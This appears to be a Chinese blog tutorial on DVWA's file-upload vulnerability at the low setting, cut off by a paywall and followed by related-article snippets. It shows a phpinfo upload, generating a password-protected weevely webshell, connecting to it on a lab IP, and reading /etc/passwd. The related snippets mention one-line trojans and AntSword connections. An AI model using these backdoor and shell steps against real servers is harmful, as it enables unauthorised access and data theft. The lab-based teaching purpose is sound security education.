DVWA 黑客攻防演练(五)文件上传漏洞 File Upload

最新推荐文章于 2024-04-24 10:48:01 发布
最新推荐文章于 2024-04-24 10:48:01 发布
阅读量392 收藏 1
点赞数
文章标签: 网络安全 安全 信息安全 文件上传 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jklbnm12/article/details/124180316
版权

说起文件上传漏洞 ,可谓是印象深刻。有次公司的网站突然访问不到了,同事去服务器看了一下。所有 webroot 文件夹下的所有文件都被重命名成其他文件,比如 jsp 文件变成 jsp.s ,以致于路径映射不到 jsp 文件,同事怀疑是攻击者上传了个 webshell 文件然后进行批量重命名了。

把后台的代码都找了一遍,后台代码也都有验证文件扩展名的,后面是发现一张普通的照片其实是代码来的,但也不知道为何能够执行。但看完这篇文章你就会明白了。 下面用 dvwa 来演示如何攻击和防御。

低级

用户界面是这样的,是一个简单的上传文件功能。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-d3icyKg0-1649937725948)(https://www.tuchuang001.com/images/2018/10/09/dvwa-file-upload-ui.png)]

然而 Hacker 就上传一个 phpinfo.php 文件

<?
phpinfo();
?>

。。。结果如下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-npUaPHJZ-1649937725951)(https://www.tuchuang001.com/images/2018/10/09/dvwa-file-upload-success.png)]

然后打开链接 http://192.168.0.110:5678/hackable/uploads/phpinfo.php ,又看到熟悉的界面了。

Hacker 想用 webshell 的方式尝试一下。于是就用 Kali Linux 预装的 weevely 工具生成一个 webshell 文件,这里的 123456 是密码,这个 webshell 要用密码登录的。

surprise! 500G网络安全学习资料,👉戳此免费获取

weevely generate 123456 /root/webshell.php
Generated backdoor with password '123456' in '/root/webshell.php' of 1479 byte size.

上传完文件后,登录

weevely http://192.168.0.110:5678/hackable/uploads/webshell.php 123456
weevely> ls

dvwa_email.png
webshell.php

www-data@56e69b5b67b6:/var/www/html/hackable/uploads $ cat /etc/passwd

root:x:0:0:root:/root:/b
最低0.47元/天 解锁文章
网安溦寀
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DVWA文件上传漏洞File Upload
qq_54537919的博客
06-27 577
DVWA文件上传漏洞File Upload
DVWA系列】File Upload 文件上传(源码分析&漏洞利用)
Pluto.的博客
03-12 818
文章目录DVWAFile Upload 文件上传一、low 级别二、medium 级别三、high 级别四、impossible 级别 DVWA File Upload 文件上传 一、low 级别 对上传文件的类型、内容没有做任何的检查、过滤 上传一句话木马文件: 成功上传: 蚁剑连接: 源代码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $targe
文件上传与包含漏洞综合利用】DVWA-文件上传-难度:High
Mr_Fmnwon的博客
04-24 1130
一方面,(任意)文件上传漏洞指的是上传非预期的文件格式(如php文件)到目标服务器,而通过其他方式(直连、包含等)进行执行来进一步利用。另一方面,利用文件包含漏洞,能够把静态文件中的php代码通过回显转发的方式进行包含执行。过程中遇到很多问题:1.high的包含漏洞保护措施没有关注 2.一些jpeg/png图片被解析时,自身的一些字符会被错误识别为php代码,而往往会导致语法错误,通过copy到最后的。可以推测,检查是否为JPEG/PNG图,是依靠文件的后缀、文件头字段信息来进行双重检测的。
DVWAupload文件上传漏洞(全难度)(小白向)
xihaxiha9的博客
04-19 2537
DVWA文件上传详解
linux下dvwa文件远程包含漏洞,DVWA-文件包含漏洞
weixin_35034072的博客
05-13 330
本周学习内容:1.学习web安全深度剖析;2.学习安全视频;3.学习乌云漏洞;4.学习W3School中PHP;实验内容:进行DVWA文件包含实验实验步骤:Low1.打开DVWA,进入DVWA Security模块将 Level修改为Low,点击Submit提交;2.打开File Inclusion文件包含漏洞模块。3.点击View Source查看服务器代码,发现对Page参数没有任何过滤和校验...
Kali渗透测试(七)—— DVWA文件上传漏洞利用
Bulldozer_GD的博客
06-04 2132
Kali linux渗透测试—— 文件上传 一 简介: 上传的文件对应用程序构成了重大风险。 许多攻击的第一步是向要攻击的系统获取一些代码。 然后,攻击仅需要找到一种方法来执行代码。 使用文件上传可帮助攻击者完成第一步。 无限制文件上传的后果可能会有所不同,包括完整的系统接管,文件系统过载,将攻击转发到后端系统以及简单的破坏。 这取决于应用程序如何处理上传的文件,包括文件的存储位置。 主要利用方式 1.直接上传 webshell 2.修改文件类型上传 webshell:mimetype 文件头、扩展名 3.
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
Web 网站文件上传漏洞和攻击 - 运维安全详细笔记 文件上传漏洞是 Web 应用程序中的一种常见漏洞,攻击者可以通过上传恶意文件来获取服务器的控制权。本文将详细介绍文件上传漏洞的原理、实验步骤和防御方法。 一、...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
文件上传upload-labs(一)
01-08
在【标题】提到的“upload-labs”是一个专门用于学习和实践文件上传漏洞的靶场环境,可以通过多种方式搭建,如使用XAMPP、phpstudy或Docker。其中,XAMPP和phpstudy是本地Web服务器开发环境,而Docker则提供了一个...
计算机病毒与防护:文件上传漏洞原理.ppt
06-10
计算机病毒与防护:文件上传漏洞原理 文件上传漏洞网络安全领域中的一个重要问题,尤其是在Web应用程序中,这种漏洞可能导致严重的安全威胁。许多网站提供文件上传功能,例如用户上传头像、社交网络上的照片分享...
DVWA File Upload 文件上传漏洞
Lee_yc的博客
09-20 973
1、查看源代码,发现对上传的文件类型做了严格的过滤,只能上传图片,正常上传php文件会报错。2、利用文件包含漏洞,用图片包含一句或木马,将图片拖入edjpgcom这个软件。6、使用antsword连接,连接成功,getshell。5、访问文件,没有反应,也没有报错,说明木马上传成功。1、查看源码,发现对文件上传的类型没有任何限制。3、上传成功,访问一下没有报错说明小马已成功。4、使用antSword连一下,连接成功。6、用antSword连接,成功。5、访问上传文件,出现乱码。4、放包,发现上传成功。
DVWA文件包含漏洞
weixin_56306210的博客
05-11 1677
DVWA文件包含漏洞
DVWA文件包含漏洞File Inclusion)
qq_54537919的博客
06-27 1143
DVWA文件包含漏洞File Inclusion)
Web安全渗透OWASP-DVWA文件上传文件包含漏洞
lx1315998513的博客
10-29 2278
配置环境 下载并启动OWASP Broken Web Apps VM v1.2(注意:网站IP地址由自己具体IP为准) Welcome to the OWASP Broken Web Apps VM !!! This VM has many serious security issues. We strongly recommend that you run it only on the...
[网络安全] Windows Server 设置文件屏蔽防止黑客利用漏洞上传特定类型的非法文件(.asp .aspx .jsp .php)
guigenyi的专栏
04-14 1181
本文主要Windows Server(2008R2)通过设置文件屏蔽的方式,防止黑客利用上传组件的漏洞上传特定类型的非法文件。网络安全是一个很复杂的领域,工作中还是需要重视的。如对您有所帮助,不胜荣幸~
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell获取主机权限
qq_51577576的博客
03-06 2715
[ 攻防演练演示篇 ] 利用通达OA 文件上传漏洞上传webshell获取主机权限
Java代码审计之FileUpload-文件上传漏洞审计与修复
liguangyao213的博客
03-11 6017
java代码审计系统课程--代码审计视频教程-信息安全-CSDN程序员研修院少写“漏洞” 了解常见代码安全 提升代码安全能力 代码不被黑客黑-https://edu.csdn.net/course/detail/32634 访问url为http://localhost:8080/file/any 直接对上传的文件保存在了指定路径下, @PostMapping("/upload") public String singleFileUpload(@RequestParam("file") Multi
dvwa文件上传漏洞
最新发布
05-11
DVWA(Damn Vulnerable Web Application)是一个专门为测试人员和安全研究人员设计的漏洞练习平台。文件上传漏洞是指攻击者通过绕过网站的文件上传功能,将自己恶意构造的文件上传到服务器上,然后利用该文件达到控制服务器的目的。一旦攻击者上传了恶意文件,他就可以在服务器上执行任意代码,并获得服务器的权限。 文件上传漏洞的成因通常是由于网站没有对上传文件类型、大小、后缀名等进行有效的限制。攻击者可以通过构造恶意文件,将其伪装成合法的文件格式,然后上传到服务器上,绕过了原本的文件类型检查,导致漏洞被利用。 为了防止文件上传漏洞的发生,开发人员需要对上传功能进行严格的限制,包括对上传文件类型、大小、后缀名等进行验证,并对上传的文件进行安全处理。此外,服务器也需要做好安全设置和权限控制,以避免攻击者利用漏洞获得服务器权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安溦寀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值